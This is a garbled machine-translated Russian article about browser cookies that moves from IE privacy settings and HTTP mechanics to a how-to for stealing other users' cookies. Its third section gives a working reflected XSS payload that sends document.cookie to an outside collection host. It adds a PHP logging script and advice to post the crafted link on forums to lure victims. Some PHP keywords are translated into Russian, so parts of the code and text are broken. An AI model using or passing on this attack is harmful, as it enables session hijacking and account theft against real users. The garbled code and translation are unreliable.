Cookie в переводе с английского означает «маленький десерт», и мы всегда можем увидеть это слово в браузере. Как еда может быть связана с браузером? Когда вы просматриваете веб-сайт, на который уже заходили ранее, вы можете увидеть на веб-странице следующее сообщение: Привет, XX, это очень дружелюбно, как если бы вы съели небольшой десерт. На самом деле это достигается путем доступа к файлу на вашем хосте, поэтому этот файл также называется файлом cookie. Хотите знать все о файлах cookie? Посмотрите ниже!
1. Понимание файлов cookie. Применимые объекты: начинающие читатели.
Файлы cookie — это небольшой текстовый файл, который веб-сайт сохраняет на вашем компьютере, когда вы просматриваете веб-сайт. Он записывает ваш идентификатор пользователя, пароль, просмотренные веб-страницы, потраченное время и другую информацию, когда вы заходите на них. на веб-сайт снова, веб-сайт узнает вашу соответствующую информацию, читая файл cookie, и может предпринять соответствующие действия, например, отобразить приветственный слоган на странице или разрешить вам просматривать его напрямую, не вводя свой идентификатор или пароль. Войдите в систему и многое другое. . Вы можете просмотреть все файлы cookie, сохраненные на вашем компьютере, выбрав «Настройки/Просмотр файлов» на вкладке «Общие» раздела «Инструменты/Свойства обозревателя» в IE. Эти файлы обычно имеют имена в формате user@domain , где user — ваше локальное имя пользователя, а домен — доменное имя веб-сайта, который вы посещаете. Если вы используете браузер NetsCape, он хранится в папке «C:PROGRAMFILESNETSCAPEUSERS». В отличие от IE, NETSCAPE использует файл cookie для записи файлов cookie всех веб-сайтов.
Чтобы обеспечить безопасность в Интернете, нам необходимо соответствующим образом настроить файлы cookie. Откройте вкладку «Конфиденциальность» в «Инструменты/Свойства обозревателя» (обратите внимание, что этот параметр существует только в IE6.0, в других версиях IE можно нажать «Пользовательский уровень» на вкладке «Безопасность» кнопки «Инструменты/Свойства обозревателя», чтобы внести простые изменения), чтобы настроить уровень безопасности файлов cookie. Обычно ползунок можно установить в положение «средне-высокое» или «высокое». Большинство сайтов-форумов требуют использования файлов cookie. Если вы никогда не посещаете эти места, вы можете настроить уровень безопасности на «Блокировать все файлы cookie». Если вы просто хотите заблокировать файлы cookie с отдельных веб-сайтов, вы можете нажать кнопку «Изменить», чтобы добавить веб-сайты, которые вы хотите заблокировать, в список. С помощью кнопки «Дополнительно» вы можете установить основные файлы cookie и сторонние файлы cookie. Основные файлы cookie — это файлы cookie с веб-сайта, который вы просматриваете, а сторонние файлы cookie не являются файлами cookie, отправленными вам веб-сайтом, который вы просматриваете. Обычно вам нужно выбрать «Отклонить» для сторонних файлов cookie, как показано на рисунке 1. Если вам нужно сохранить файлы cookie, вы можете использовать функцию «Импорт и экспорт» IE, открыть «Файл/Импорт и экспорт» и следовать инструкциям.
Большая часть содержимого cookie зашифрована, поэтому нам кажется, что это просто бессмысленная комбинация букв и цифр. Только CGI-обработчик сервера знает их истинное значение. Мы можем просмотреть больше контента с помощью некоторого программного обеспечения. Информация файлов cookie, просмотренная с помощью программного обеспечения Cookie Pal, показана на рисунке 2. Он предоставляет нам содержимое серверов, сроков действия, имени, значения и других параметров. Среди них «Сервер» — это веб-сайт, на котором хранятся файлы cookie, Expires записывает время и срок действия файла cookie, а поля «Имя» и «Значение» представляют собой конкретные данные (подробное введение в это программное обеспечение содержится в выпуске 10, стр. 42 этой газеты).
Адрес загрузки: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Процесс доставки файлов cookie. Применимые объекты: читатели среднего уровня. Когда они вводят URL-адрес веб-сайта в адресную строку браузера, браузер отправляет запрос на чтение веб-страницы на веб-сайт и отображает результат на мониторе. В это время веб-страница ищет файл cookie, установленный веб-сайтом Amazon, на вашем компьютере. Если он будет найден, браузер отправит данные в файле cookie вместе с ранее введенным URL-адресом на сервер Amazon. Когда сервер получает данные файлов cookie, он извлекает ваш идентификатор, записи о ваших покупках, личные предпочтения и другую информацию из своей базы данных, записывает новый контент и добавляет его в базу данных и файлы cookie. Если файлы cookie не обнаружены или информация вашего файла cookie не соответствует информации в базе данных, это означает, что вы просматриваете веб-сайт впервые, и программа CGI сервера создаст для вас новую идентификационную информацию и сохранит ее в базе данных.
Файлы cookie передаются с использованием информации HTTP-заголовка в коде веб-страницы. Файлы cookie могут передаваться при каждом запросе веб-страницы, сделанном браузером, например, когда браузер открывает или обновляет веб-страницу. Сервер добавляет файл cookie в информацию HTTP-заголовка веб-страницы и передает данные веб-страницы обратно в ваш браузер. Браузер выбирает, сохранять ли эти данные, на основе настроек файлов cookie на вашем компьютере. Если браузер не разрешает сохранение файлов cookie, данные исчезнут после закрытия браузера. Время хранения файлов cookie на вашем компьютере различно, что определяется настройками сервера. Файлы cookie имеют атрибут Expires (период действия), который определяет время хранения файлов cookie. Сервер может изменить время хранения файлов cookie, установив значение поля Expires. Если этот атрибут не установлен, файлы cookie действительны только во время просмотра веб-страниц. Если вы закроете браузер, эти файлы cookie автоматически исчезнут. Это относится к большинству веб-сайтов. Обычно файл cookie содержит поля «Сервер», «Истекает», «Имя» и «Значение». Только поля «Имя» и «Значение» полезны для сервера. Содержимое полей «Срок действия» и других полей предназначено только для того, чтобы сообщить браузеру, как обрабатывать эти файлы cookie.
3. Реализация программирования файлов cookie. Применимые объекты: продвинутые программы чтения. Большинство языков веб-программирования обеспечивают поддержку файлов cookie. Такие как JavaScript, VBScript, Delphi, ASP, SQL, PHP, C# и т. д. В этих объектно-ориентированных языках программирования использование Cookie в программировании в основном аналогично. Общий процесс таков: сначала создайте объект Cookie (Объект), а затем используйте функцию управления для назначения, чтения, записи и других операций с Cookie. Так как же получить конфиденциальную информацию в файлах cookie других пользователей с помощью кода? Далее следует краткое введение.
Этот метод состоит из двух основных шагов: сначала найдите веб-сайт, который вам нужен для сбора файлов cookie, проанализируйте его и создайте URL-адрес, затем скомпилируйте код PHP для сбора файлов cookie и разместите его на веб-сайте, которым вы можете управлять, не зная об этом. код может быть выполнен после того, как пользователь щелкнет созданный вами URL-адрес. Давайте посмотрим на конкретный процесс реализации ниже.
1. Проанализируйте и создайте URL-адрес.
Сначала откройте веб-сайт, на котором мы хотим собирать файлы cookie. Мы предполагаем, что это http://www.XXX.net . Войдите на веб-сайт и введите имя пользователя «<A1>» (. без кавычек) для анализа данных и перехвата пакетов получите код в виде «http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x. =28&ok.y=6", замените "<A1>". Попробуйте еще раз для "<script>alert(document.cookie)</script>"; если выполнение прошло успешно, начните создавать URL-адрес: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Среди них http:///www.cbifamily.org/cbi.php — это скрипт на определенном хосте, которым вы можете управлять. Следует отметить, что «%2B» — это URL-кодировка символа «+», поскольку «+» будет рассматриваться как пробел. URL-адрес можно опубликовать на форуме, чтобы побудить других щелкнуть по нему.
2. Подготовьте сценарий PHP.
Функция этого сценария — сбор файлов cookie. Конкретное содержимое следующее:
<?php
$info = getenv("QUERY_STRING");
если ($информация) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
заголовок("Местоположение: http://www.downcodes.com ");
?>
4. Проблемы безопасности файлов cookie. Применимые объекты: все читатели, которые хотят быть в безопасности в Интернете.
1. Обман файлов cookie.
Файлы cookie записывают такую информацию, как идентификаторы учетных записей пользователей и пароли. При передаче в Интернете обычно используется шифрование MD5. Даже если зашифрованная информация будет перехвачена в Интернете некоторыми людьми со скрытыми мотивами, они не смогут ее понять, поскольку все, что они видят, — это бессмысленные буквы и цифры. Однако проблема сейчас в том, что людям, которые перехватывают файлы cookie, не нужно знать значение этих строк. Им нужно только отправить файлы cookie других людей на сервер, и если они смогут пройти проверку, они смогут выдать себя за личность жертвы и выдать себя за жертву. войдите на сайт. Этот метод называется подменой файлов cookie. Предпосылкой для подмены файлов cookie является наличие уязвимости в программе проверки сервера, и самозванец хочет получить информацию о файлах cookie выдающего себя человека. Текущей программе проверки веб-сайта очень сложно исключить все незаконные входы в систему. Например, язык, используемый для написания программы проверки, может иметь лазейки. Более того, получить куки-файлы других людей очень легко. Вы можете добиться этого, написав небольшой фрагмент кода на языке, поддерживающем куки-файлы (подробнее см. в методе 3), пока этот код размещен в сети, все куки-файлы будут доступны каждому. можно собирать. Если на форуме разрешен HTML-код или разрешено использование Flash-тегов, вы можете использовать эти технологии для сбора кода cookie и размещения его на форуме, а затем придать сообщению привлекательную тему и написать интересный контент, и вы сможете быстро собрать большое количество файлов cookie. На форуме у многих людей украли пароли таким методом. Что касается того, как это предотвратить, то на данный момент конкретного лекарства нет. Мы можем использовать только обычные методы защиты. Не используйте важные пароли на форумах, не используйте функцию IE для автоматического сохранения паролей и старайтесь не заходить на сайты. где вы не знаете подробностей.
2. Скрытые опасности Flash-кода
. Во Flash есть функция getURL(), которую можно использовать для автоматического открытия указанной веб-страницы. Поэтому это может привести вас на веб-сайт, содержащий вредоносный код. Например, когда вы смотрите красивую Flash-анимацию на своем компьютере, код в кадре анимации мог быть незаметно подключен к Интернету и открыть очень маленькую страницу, содержащую специальный код. Эта страница может собирать ваши файлы cookie и выполнять другие действия, например установку троянских программ на ваш компьютер или даже форматирование жесткого диска и т. д. Веб-сайты не могут запретить такое поведение Flash, поскольку это внутреннее поведение Flash-файлов. Что мы можем сделать, так это попытаться открыть брандмауэр, если вы просматриваете локально. Если брандмауэр предлагает вам не знать отправляемые пакеты данных, лучше всего их запретить. Если вы хотите насладиться этим в Интернете, лучше всего найти несколько известных крупных веб-сайтов.